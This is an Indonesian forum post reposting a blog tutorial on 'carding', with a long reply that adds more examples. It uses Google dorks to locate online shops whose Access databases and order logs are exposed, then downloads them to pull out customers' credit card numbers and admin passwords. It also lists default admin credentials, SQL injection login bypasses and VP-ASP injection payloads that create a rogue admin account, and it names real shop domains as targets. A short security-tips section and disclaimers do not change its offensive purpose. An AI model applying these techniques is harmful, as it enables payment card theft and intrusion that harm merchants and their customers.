Carding-in database memiliki dua makna.
Yang pertama adalah “Cardingin Database”.
Sedangkan yang kedua bisa berarti “Carding in (dalam) database”.

Mulai saat ini dan seterusnya, Anda akan menemukan teknik carding yang ternyata bisa dilakukan dengan begitu sederhana. Anda tidak perlu mengerti proses enkripsi mencuri password terlebih dahulu untuk bisa masuk ke sebuah situs. Dalam bab ini Anda akan mempelajari beberapa teknik yang langsung mengakses database.

Berikut ini saya berikan sebuah teknik yang bisa digunakan untuk proses carding. Anda tidak memerlukan tools, untuk melakukan hal ini. Hanya bermodalkan sebuah browser, dan membuka situs Google.

Vsproducts.mdb
Sebenarnya kalau boleh dibilang teknik ini sudah lama dan kuno. Tapi, sampai saat ini masih banyak yang bisa dicardingin. Semua itu tergantung dari kreativitas Anda.
File database yang akan dicolong adalah vsproducts.md. File ini merupakan bawaan template shopping cart ASP yang diterapkan pada sistem Microsoft Frontpage. Bagi Anda yang beruntung juga bisa menemukan nomor kartu kredit yang tidak dienkripsi. Sebab enkripsi itu sendiri bersifat optional, jadi tidak bawaan langsung, sehingga bisa langsung tampil.

Kode untuk menghubungkan database dengan file database yang digunakan adalah sebagai berikut:

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=<%=server.mappath(“vsproducts.mdb”)%>;”

Sebenarnya, situs yang menerapkan model seperti ini, memiliki file test (percobaan):
http://www.situs-target.com/fpdb/test.asp

Saya harap dari penjelasan ini, pikiran negatif Anda sudah bisa bangun. Jadi, apabila Anda tidak menemukan file vsproducts.mdb langsung dari hasil searching namun menemukan link seperti di atas, patut Anda curigai. Sebab kemungkinan besar mengandung file vsproducts.mdb.
Biasanya, pesan yang muncul saat melakukan test tersebut adalah:

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;”

Apabila file yang Anda jalankan adalah:
db_con_open.asp maka pesan yang muncul adalah:

<%
DIM sDSN

sDSN=”Provider=Microsoft.Jet.OLEDB.4.0;Data
Source=C:\web\database\vsproducts.mdb;”

%>

Cukup sedikit saja teorinya, kita segera saja membahas poin berikutnya. Pada bagian query Google Anda masukkan syntax:

allinurl:proddetail.asp?prod=

Sekarang Anda buka hasil searching Google tersebut, satu per satu.
Misalnya, nama situs target yang saya peroleh adalah
http://www.situs-target.com/store/proddetail.asp?prod=10001G

Saya ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb

Efek sampingnya adalah Anda bisa mendownload file database secara langsung Smile.
Dari kota dialog download tersebut klik tombol Save untuk menyimpan file database yang Anda dapatkan.
Dalam kotak dialog Save As simpan file tersebut dengan mengklik kembali tombol Save.
Tunggulah proses download dilakukan sampai selesai. Setelah selesai, klik tombol Open untuk membuka dengan aplikasi MS.Access.
Perhatikan pada hasil target yang Anda peroleh, tampak bahwa data kartu kredit ada pada tabel Orders. Tiap hasil yang Anda peroleh bisa berbeda antara situs yang satu dengan situs yang lain.

Selain itu, kita juga akan memperoleh nama administrator beserta passwordnya pada bagian Admin.
Nah, Anda sudah mendapatkan satu database pertama.
Sebagai tambahan untuk penjelasan bagian ini, saya harap Anda bisa mempermainkan folder atau directory yang terdapat di dalamnya. Masalah mempermainkan folder ini termasuk dalam bagian ilmu Google Hacking atau Google Dorks. Pada kesempatan ini cukup saya jelaskan sekilas saja.
Misalnya Anda mendapat target:
http://www.situs-target.com/store/proddetail.asp?prod=10001G

Ubah URL-nya menjadi:
http://www.situs-target.com/store/fpdb/vsproducts.mdb
http://www.situs-target.com/fpdb/vsproducts.mdb
http://www.situs-target.com/store/vsproducts.mdb
http://www.situs-target.com/vsproducts.mdb

Tujuannya adalah untuk menemukan dimana letak file database disembunyikan.
Proses kreatif lainnya yang perlu Anda pahami adalah mengira-ngira nama file yang mirip. Hal ini sengaja saya jelaskan pada bagian awal. Sebab, jika nanti-nanti Anda sedang mencoba beraksi ternyata tidak berhasil, maka Anda harus memahami bagian ini, karena saya tidak akan menjelaskan lagi pada bagian berikutnya.
Contohnya begini, saya ambil dari kasus di atas, nama file database-nya adalah: vsproducts.mdb. Kira-kira yang mirip adalah file vsproduct.mdb (tanpa huruf s). Atau mungkin saja vspproducts.mdb, vspproduct.mdb, pokoknya pintar-pintar Anda-lah.
Walaupun hal ini kelihatannya sepele, sebenarnya dari banyak kejadian yang saya temukan banyak yang berhasil. Hal ini terjadi karena untuk mengamankan sebuah sistem, sering nama file database disamarkan, dan biasanya pula namanya hampir mirip-mirip. Contoh lainnya, ada tulisan orders, ada juga order. Bahkan beberapa kasus bersifat case sensitive, jadi apabila Anda mengetikkan Credit Card akan dianggap berbeda dibanding mengetikkan credit card.
Itulah dua poin penting yang perlu Anda pahami, supaya hasil target Anda menjadi lebih banyak. Tentu saja semua itu butuh kesabaran dan kreativitas. Sebagai bonus dari saya untuk bagian ini, adalah berikut halaman loginnya:
http://www.situs-target.com/vsadmin/admin.asp
dengan account dan password default adalah mystore dan changeme.
Seandainya Anda tidak bisa masuk dengan password default, Anda tetap masih bisa masuk menggunakan account dan password dan file database yang Anda peroleh. Smile

Shopping.mdb
Salah satu file database yang paling terkenal adalah shopping.mdb. Nama file database ini yang dibuat menggunakan MS.Access, biasanya juga terhubung dengan ASP. Berikut adalah teknik untuk mendapatkan file database tersebut yang berisikan data customer.
Seperti biasa, gunakan Google untuk mencari targetnya. Langkah detilnya sudah saya jelaskan pada bagian mencari database yang pertama, jadi saya tidak akan mengulang-ulang lagi. Maka saya hanya akan menyebutkan syntax-nya saja untuk bagian berikutnya.
Syntax: inurl:shopping.mdb
Dari link hasil searching, saya hanya perlu mendownload file databasenya. Isinya bukan hanya data kartu kredit baik customer maupun orders. Ada juga password user dan administrator di dalamnya.
Proses download bisa berbeda pada tiap orang, terutama bila menggunakan aplikasi software internet download manager yang cukup beragam dalam mendownload file database.
Saya tidak mau berpanjanglebar menjelaskan masalah teknik dan nama file secara spesifik. Saya lebih tertarik untuk mengajarkan konsepnya. Sebab dengan cara seperti itu, Anda bisa mengembangkan sendiri teknik yang diperlukan. Mengapa hal ini saya tekankan, karena nama file database bisa saja berbeda-beda. Tergantung dari nama pembuat filenya dan juga demi alasan keamanan. Sebenarnya, jika Anda mau sedikit usaha, Anda bisa memodifikasi syntax: inurl:shopping.mdb , menjadi bentuk lainnya. Dalam hal ini, saya mencoba mengubahnya menjadi:
Shopping350.mdb, shopping400.mdb, dan shopping450.mdb.
Bahkan juga ada shopping.mdb, yang berupa nama file database adalah nama situs itu sendiri. Ternyata banyak juga hasil searching yang memuaskan untuk menjadi bahan latihan carding. Ini penting bagi calon ahli webmaster yang mungkin suatu saat berminat bekerja sebagai webmaster atau penjaga keamanan situs belanja di internet.

Eipc.mdb
File database eipc.mdb adalah file default dari ProductCart. Biasanya, file ini disimpan dalam direktori productcart/database/eipc.mdb. Ada juga dari file tersebut yang mengalami proteksi password. Untuk mencari situs yang memakai sistem database ini gunakan syntax berikut untuk mencarinya di google.com
Syntax: allinurl:productcart/database/EIPC.mdb

Expire.mdb
Kalau diterjemahkan secara kasar maka expire.mdb berarti tanggal berakhirnya sebuah kartu kredit. Walau sebenarnya maksudnya bukan itu, tapi nyatanya itu tetap berhubungan dengan carding. Bingung bukan?
Sebenarnya, ini adalah file default dari CatalogIntegrator Cart; yang merupakan aplikasi e-commerce yang dijual pertama kali oleh pihak Adobe System. Aplikasi ini lebih bersifat customer friendly, dan mudah digunakan sehingga cukup banyak pihak yang tertarik untuk menggunakannya.
Syntax: inurl:expire.mdb
Sebagai tambahan saja, pada kebanyakan kasus password default untuk admin yang menggunakan expire.mdb adalah demo, dengan nama account admin adalah: admin
Halaman loginnya:
http://www.situs-target.com/Catalog/Admin/admin.asp
Perhatikan dengan benar huruf besar kecilnya pada URL supaya tidak terjadi error.
Lokasi file expire.mdb itu sendiri bisa Anda perhatikan secara cermat.
Apalagi jika seseorang bisa masuk, maka dia akan dapat melihat berbagai order pembelian dan tentu saja nomor kartu kredit terdapat di dalamnya. Tapi, saya rasa dengan mendapatkan file database-nya saja sudah cukup kok.

Products.mdb
Sebenarnya ini adalah nama file database yang cukup umum digunakan. Oleh karena ini milik umum maka isinya bisa saja bermacam-macam. Ada yang menampilkan nama produk saja dalam database. Ada pula yang menampilkan daftar order termasuk nomor kartu kredit pada konsumen.
Namun, jangan ragu jangan takut, banyak juga kok yang berisikan data konsumen. Tapi ada pula beberapa yang tidak menyertai nomor kartu kredit.
Ha…ha…ha…apa Anda bingung bacanya. Makanya lebih enakan filenya Anda download sendiri yang banyak biar jelas.
Syntax: inurl:products.mdb

Billing.mdb
File database billing.mdb ini menyimpan data kartu kredit dalam tabel Payments. Supaya lebih enak, mendingan Anda buka semua tabel dari hasil download yang Anda dapatkan. Sebab data kartu kredit tidak hanya disimpan dalam tabel Credit Cards, Orders, dan Customers. Karena bisa saja dimanipulasi oleh pembuat database, misalnya nama tabel Time (waktu), tapi isinya malah nomor kartu kredit. Dan hal ini berlaku bagi semua file database dalam buku ini. Makanya jangan cepat menyerah, tetap semangat untuk memperoleh pengalaman dan pengetahuan baru mengenai network security ini.

Shop.mdb
Berikut adalah jenis database lainnya yang sering digunakan untuk aktivitas carding. Shop.mdb, jika diterjemahkan berarti database toko, tentu saja isinya bisa komplit termasuk kartu kredit customer.
Syntax: inurl:shop.mdb
Setiap file shop.mdb yang saya temukan selalu berupa form. Jika mau, Anda juga bisa membuka dalam bentuk tabel.

Exploitshop.mdb
Dalam kesempatan ini saya tidak akan banyak berbicara mengenai exploit. Mengapa hal ini saya batasi, sebab kebanyakan exploit adalah teknik kuno yang sudah basi sehingga tidak banyak digunakan lagi. Beberapa exploit yang saya bahas dalam artikel ini, tujuan sebenarnya hanyalah untuk memberikan cara lain sebagai bentuk variasi, paling tidak untuk memberikan wawasan dan pengetahuan baru bagi Anda, terutama para calon webmaster. Dan selain itu juga sekaligus untuk membuka mata Anda supaya tahu bahwa tidak semuanya bisa langsung dengan cara mendownload database maupun file log. Masih dengan nama database yang sama, yaitu shop.mdb. Hanya saja model syntax dan teknik yang dilakukan berbeda.
Syntax: inurl:mall/lobby.asp
Dari situs target yang Anda temukan saat searching di Google, bukalah URL yang ditampilkan oleh Google. Biasanya, nama URL-nya adalah:
http://www.situs-target.com/mall/lobby.asp

Yang harus Anda lakukan adalah mengubah string
mall/lobby.asp
menjadi
fpdb/shop.mdb

Sehingga secara lengkap akan menjadi:
http://www.situs-target.com/fpdb/shop.mdb
Selanjutnya, Anda tinggal mendownload file databasenya. Data mengenai kartu kredit tersimpan pada bagian Payments (pembayaran).

Store.mdb
File database store.mdb ini adalah nama lain dari shop, juga nama lain untuk products. Walau demikian, file store.mdb ini menyimpan cukup banyak nomor kartu kredit. Dan biasanya disimpan dalam tabel Carthead.
Syntax: inurl:store.mdb

Mystore.mdb
Setelah menggunakan syntax store.mdb, berikut ini adalah model lainnya, yaitu: mystore.mdb. File database mystore.mdb ini banyak digunakan pada aplikasi shopping cart FPcartPal. Sistem ini menangani kartu kredit yang lebih aman. Sebab mereka menggunakan PayPal. Paypal adalah salah satu alat pembayaran elektronik di internet.
Syntax: inurl:mystore.mdb
Jujur saja, database ini tidaklah berisi nomor kartu kredit, sebab saya hanya ingin menunjukkan pada Anda bagaimana memodifikasi sebuah syntax. Dalam hal ini, dari store.mdb menjadi mystore.mdb. Sebenarnya, berhubungan dengan file mystore.mdb pada sistem yang sama terdapat sebuah file laporan yaitu reports.mdb. Isinya adalah laporang tentang transaksi, nggak ada kartu kreditnya. Tapi para carder biasanya memanfaatkan untuk hal lainnya. Sebab siapa tahu saja, barangkali ada file database reports.mdb yang menyimpan data kartu kredit karena bukan bagian dari produk FpcartPal, begitu pula untuk mystore.mdb.

Order.mdb
Saya rasa Anda sudah mengenal dengan jelas order.mdb yang berarti file database pemesanan. Berarti setiap pesanan akan disimpan dalam database yang satu ini. Tentu saja untuk berbelanja salah satu sarananya adalah untuk menggunakan kartu kredit.
Syntax: inurl:order.mdb

Cart.mdb
Ini dia kata-kata yang sering digunakan dalam online shop. Semua barang belanjaan di internet akan dimasukkan ke dalam cart (keranjang). Nah, seseorang bisa saja memanfaatkannya untuk melakukan aktivitas carding.
Syntax: inurl:cart.mdb
Kemungkinan lain dari database ini yang telah dimodifikasi. Misalnya, shoppingcart.mdb, shopping_cart.mdb, cart.mdb, clickcart.mdb, dan berbagai bentuk lainnya. Sesuai dengan kesukaan sang pemilik situs. Trik ini digunakan untuk mengelabui para carder supaya tidak bisa mendapatkan file mdb dengan mudah.

Scart.mdb
Serupa tapi tak sama. Itulah yang bisa saya jelaskan mengenai database scart.mdb. Ada dua model syntax yang bisa Anda coba gunakan.
allinurl:admin/scart.mdb
atau
inurl:scart.mdb
Sebenarnya model syntax ini bisa Anda modifikasi sendiri, termasuk juga untuk syntax-syntax lainnya yang terdapat dalam artikel ini. Kreatiflah mengubah syntax seperti kasus store menjadi mystore. Kalau Anda mau lebih jelas, Anda harus banyak belajar mengenai berbagai syntax google hacking (google dorks).

ExploitScart.mdb
Untuk nama database yang sama, yaitu scart.mdb, akan saya berikan sebuah exploit. Langsung saja, dengan menggunakan syntax untuk Google:
inurl:shopKart20
Bisa juga dimodifikasi menjadi “/shopKart20/”
(tanda kutip duanya tetap digunakan)
Selanjutnya Google akan menampilkan target-target empuk yang mempunyai celah keamanan yang belum sempurna. Silakan Anda buka saja. Misalnya:
http://www.situs-target.com/ashopKart20/addprod.asp
Pertama-tama hilangkan tanda string: ashopKart20 dan seterusnya. Kemudian tambahkan string:
admin/scart.mdb
Jadinya:
http://www.situs-target.com/admin/scart.mdb
Secara otomatis akan muncul pesan apakah Anda akan mendownload file database.
Anda bisa mendownload file database langsung ataupun menggunakan program pihak ketiga, misalnya internet download manager yang softwarenya banyak ditemui di internet dan bisa didownload lalu diinstal di komputer Anda.
Dalam database tersebut, nomor kartu kredit berada pada bagian orders. Sedangkan informasi pembeli berada pada bagian Customers. Sehingga nama pemilik kartu kredit bisa diketahui dari tabel customers lalu dicocokkan id-nya dengan orders.

Miscellaneous Database
Berikut ini adalah teknik untuk mendapatkan file database, yang boleh dibilang nama databasenya acak. Jadi miscellaneous bukan berarti itu adalah nama sebuah database. Sebenarnya hampir sama saja cara dan tekniknya dengan beberapa yang ada yang tadi sudah dibahas. Nama database itu bisa apa saja, misalnya toko.mdb, jual.mdb.
Akan saya suguhkan sebuah contoh kasus.
Syntax: /shop/category.asp/catid
Misalnya, Anda menemukan target dengan url:
http://www.situs-target.com/shop/category.asp?catid=37
Hapuslah shop/category.asp?catid=37 (angkanya bisa berapapun, tergantung situs target yang Anda peroleh). Kemudian ganti menjadi:
/admin/dbsetup.asp
Maka nama situsnya menjadi:
http://www.situs-target.com//admin/dbsetup.asp
Perhatikan dengan baik dan benar, garis miring (/) yang digunakan sebelum admin ada dua buah (//admin). Jadi itu bukan karena salah ketik!
Berikut adalah tampilan dua buah target yang saya temukan. Sengaja pada bagian ini saya memberikan contoh dua buah target untuk menampilkan mana file databasenya.
Misalnya dari contoh target yang pertama, nama file databasenya adalah icommerce.mdb. Sedangkan nama file database untuk situs target kedua adalah worldofwater.mdb.
Urusan download database-nya sekarang saya serahkan pada Anda supaya logika dan pikiran Anda bisa berkembang. Lagipula nama databasenya sudah ketahuan kok.

SHOPPER EXE EXPLOIT
Berikut ini syntax yang bisa dicoba:
http://www.situs-target.com/cgi-bin/shopper.exe?search=action&keywords=Dy4-VoN%2520&template=order.log

atau

http://www.situs-target.com/cgi-bin/shopper.cgi?search=action&keywords=Dy4-VoN%20&template=order.log

looding sebentar…….

Wah ternyata, banyak juga log file hasil shopping yang ditemukan….

Setelah penulis cek dan lihat hasil log file nya banyak juga cc yang masih fresh tapi tidak ada no cvv nya, hanya no pemegang kartu dan no cc dan cardExpire.

Sekali lagi, ini hanya ilmu pengetahuan dan sangat tidak disarankan untuk menyalahgunakannya.
Jika anda sebagai web master dari shopping online, tentunya anda harus lebih berhati-hati dengan teknik ini.

SECURITY TIPS (TIPS UNTUK KEAMANAN JARINGAN WEBSITE ANDA)
Khusus untuk Anda yang mengelola sebuah situs online shopping, usahakanlah untuk membuat file database yang tidak bisa diakses melalui directory public. Hindari meletakkan file database pada webroot. (Tahu kan apa yang dimaksud dengan webroot? kalau nggak tahu banyaklah membaca buku-buku tentang jaringan internet, atau bisa juga membaca-baca di wikipedia.com)
Buatlah permission untuk mengakses database pada sebuah direktori khusus, hal ini akan mencegah orang lain mendownload file database. Jangan gunakan nama database default. Ubahlah menjadi nama lainnya yang Anda rasa aman. Untuk para user, berhati-hatilah untuk berbelanja pada situs online. Carilah informasi mengenai sistem keamanan situs tersebut. Dan pastikan bahwa halaman belanja yang Anda buka bukanlah scam page, juga bukan phising.

[url]http://iptek-indonesia.blogspot.com/2008/08/credit-dtabase.html[/url]

keep laerning…..[/quote]

exmaples to learn carding….      Balas dengan kutipan
Contoh bugs pada bentuk toko system : shopadmin

Ketik keyword google : allinurl:/shopadmin.asp
Contoh target : http://www.Target.com/shopadmin.asp
user : ‘or’1
pass : ‘or’1

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google : allinurl:/store/index.cgi/page=
Contoh target : http://www.Target.com/cgi-bin/store/…short_blue.htm
Hapus short_blue.htm dan ganti dengan :./admin/files/order.log
Hasilnya:http://www.Target.com/cgi-bin/store/…iles/order.log

Contoh bugs pada bentuk toko sistem : metacart

Ketik keyword google.com : allinurl:/metacart/
Contoh target : http://www.Target.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan : –> /database/metacart.mdb
Hasilnya : /www.Target.com/metacart/database/metacart.mdb

Contoh bugs pada bentuk toko sistem CShop

Ketik keyword google.com : allinurl:/DCShop/
Contoh : http://www.Target.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan
/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt
Hasilnya : http://www.Target.com/xxxx/DCShop/orders/orders.txt

Contoh bugs pada bentuk toko sistem : EShop

Ketik keyword google.com : allinurl:/eshop/
Contoh : http://www.Target.com/xxxxx/eshop
Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb
Hasilnya : http://www.Target.com/…/cg-bin/esh…base/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
Contoh bugs pada bentuk toko sistem : PDshopro

Ketik keyword google.com : allinurl:/shop/category.asp/catid=
Contoh : http://www.Target.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp
Hasilnya : http://www.Target.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
http://www.Target.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)

Contoh bugs pada bentuk toko sistem : commerceSQL

Ketik keyword google.com : allinurl:/commercesql/
Contoh : http://www.Target.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=
Hasilnya : http://www.Target.com/cgi-bin/commer…ndex.cgi?page=
Untuk melihat admin config
http://www.Target.com/cgi-bin/commer…/admin_conf.pl
Untuk melihat admin manager
http://www.Target.com/cgi-bin/commer…in/manager.cgi
Untuk melihat file log/CCnya
http://www.Target.com/cgi-bin/commer…iles/order.log

Contoh bugs pada bentuk toko sistem : Cart32 v3.5a

Ketik keyword google.com : allinurl:/cart32.exe/
Contoh : http://www.Target.net/wrburns_s/cgi-…xe/NoItemFound
Ganti NoItemFound dengan : error
Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format
/akhiran.c32 berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www. Target.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format
http://www.Target.com/cart32/
Contoh http://www.Target.net/wrburns_s/cgi-…RNS-001065.c32

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp

Contoh :
http://Target.com/vpasp/shopdisplayp…39;a%25′–

Gantilah nilai dari string url terakhir dg:
: %20′a%25′–
: %20′b%25′–
: %20′c%25′–
Kalau berhasil, kita akan mendapatkan informasi username dan password admin
Untuk login admin ke http://Target.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya

Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0

Ketik keyword google.com : Ketik –> allinurl:/vpasp/shopsearch.asp

Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine :

Keyword=&category=5); insert into tbluser (fldusername) values
(”)–&SubCategory=&hide=&action.x=46&action.y=6

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Keyword=&category=3); update tbluser set fldaccess=’1′ where
fldusername=”–&SubCategory=All&action.x=33&action.y=6

Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :

Keyword=&category=5); update tbluser set fldpassword=” where
fldusername=’admin’–&SubCategory=All&action.x=33&action.y=6

Untuk login admin, ada di http://Target/vpasp/shopadmin.asp

Contoh bugs pada bentuk toko sistem : Lobby.asp

Ketik keyword google.com : allinurl: Lobby.asp
Contoh : http://www.Target.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb
Hasilnya : http://www.Target.com/fpdb/shop.mdb

Contoh bugs pada bentuk toko sistem : Shopper.cgi

Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi
Contoh : http://www.Target.com/cgi-local/shop…dd=action&key=
Tambah dengan :…&template=order.log
Hasilnya :
http://www.xxxxxxxx.com/cgi-local/sh…late=order.log

Contoh bugs pada bentuk toko sistem :Proddetail.asp

Ketik keyword google.com : allinurl [Stick Out Tongue] roddetail.asp?prod=
Contoh : http://www.Target.org/proddetail.asp…ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369
dan ganti dengan –> fpdb/vsproducts.mdb
Hasilnya : http://www.Target.org/fpdb/vsproducts.mdb
Contoh bugs pada bentuk toko sistem [Big Grin] igishop

Ketik keyword google.com : inurl:”/cart.php?m=”
Contoh : http://Target.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view
dan ganti dengan –>admin
Hasilnya http://Target.com/store/admin

Trus masukin username sama pass nya pake statment SQL injection

Usename : ‘or”=”
Password : ‘or”=”

setelah bisa login, cari data yang diperlukan .

Contoh bugs pada bentuk toko sistem : Index CGI

Ketik keyword google.com : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/…ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/…iles/order.log
trus copy-paste tuch log’nya di notepad biar gampang di baca

Contoh bugs pada bentuk toko sistem : Index Cart

Ketik keyword google.com : inurl:”/cart.php?m=”
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :’or”=”
Passwordnya :’or”=”
contoh target buat kalian :
https://www.therustybucket.biz/store/admin

Contoh bugs pada bentuk toko sistem : Index cart

Ketik keyword google.com : /ashopKart20/”
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example http://www.garrysun.com/ashopkart20/addprod.asp
Injection : selanjutnya masukin bugs di atas jadi : http://www.garrysun.com/ashopkart20/admin/scart.mdb
kalo berhasil loe dapet file beresktension .mdb nach file itu
tmn2 open with MS-Acces

Contoh bugs pada bentuk toko sistem : Catid

Ketik keyword google.com : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : http://www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : http://www.littlesport.net//admin/dbsetup.asp
kalo berhasil dapet file.mdb trus buka pake MS – Access tapi kalo gagal berarti
dah keduluan ma carder yang lain… cari target lain ok..??

Contoh bugs pada bentuk toko sistem : Store

Ketik keyword google.com : inurl:”/store/proddetail.asp?prod=”
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
Example : http://www.successlink.org/store/pro…prod=SL-IP0001
masukin bugsnya http://www.successlink.org/store/fpdb/vsproducts.mdb
download file .mdbnya trus buka pake MS- ACCESS..

Contoh bugs pada bentuk toko sistem : Sunshop

Ketik keyword google.com : “Powered by SunShop 3.2″
Atau google dork : inurl:”/sunshop/index.php?action=”
Bugs : ganti kata index.php dgn admin
kl ada peringatan java script error klik “OK” aja
Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php
ganti dengan admin http ://www.dohertysgym.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :’or”=’

Contoh bugs pada bentuk toko sistem : digishop

Ketik keyword google.com
Ketik keyword google.com : “Powered by Digishop 3.2″
Bugs : hapus tulisan cart.php?m= dengan admin
Login pake SQL Injection :
Username : ‘or”=”
Password : ‘or”=”
Contoh target :
http://uniquescrapbooks.com.au/store/admin
http://www.7footserb.com/shop/admin
https://www.tangerineclothing.com/admin

Contoh bugs pada bentuk toko sistem :Lobby

Ketik keyword google.com : inurl:”mall/lobby.asp”
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page – Search our Inventory
jadi http://www.gemdepot.com/fpdb/shop.mdb
dapat dech .mdb ===> trus klik open database JANGAN klik “convert databese” ===> klk view orders ====> trus cari orang yg pernah belanja contoh pada customer no 36 trus dimana no CCnya badKiddes….
sabar bro… masih di table customer no 36 then klik payment

————————————————————————————————–

silahkan di pelajari…….

ingat,

artikel ni cman bwt pelajaran,,

segala akibat yang terjadi akibat penyalahgunaan artikel ini
diluar tanggung jawab saya..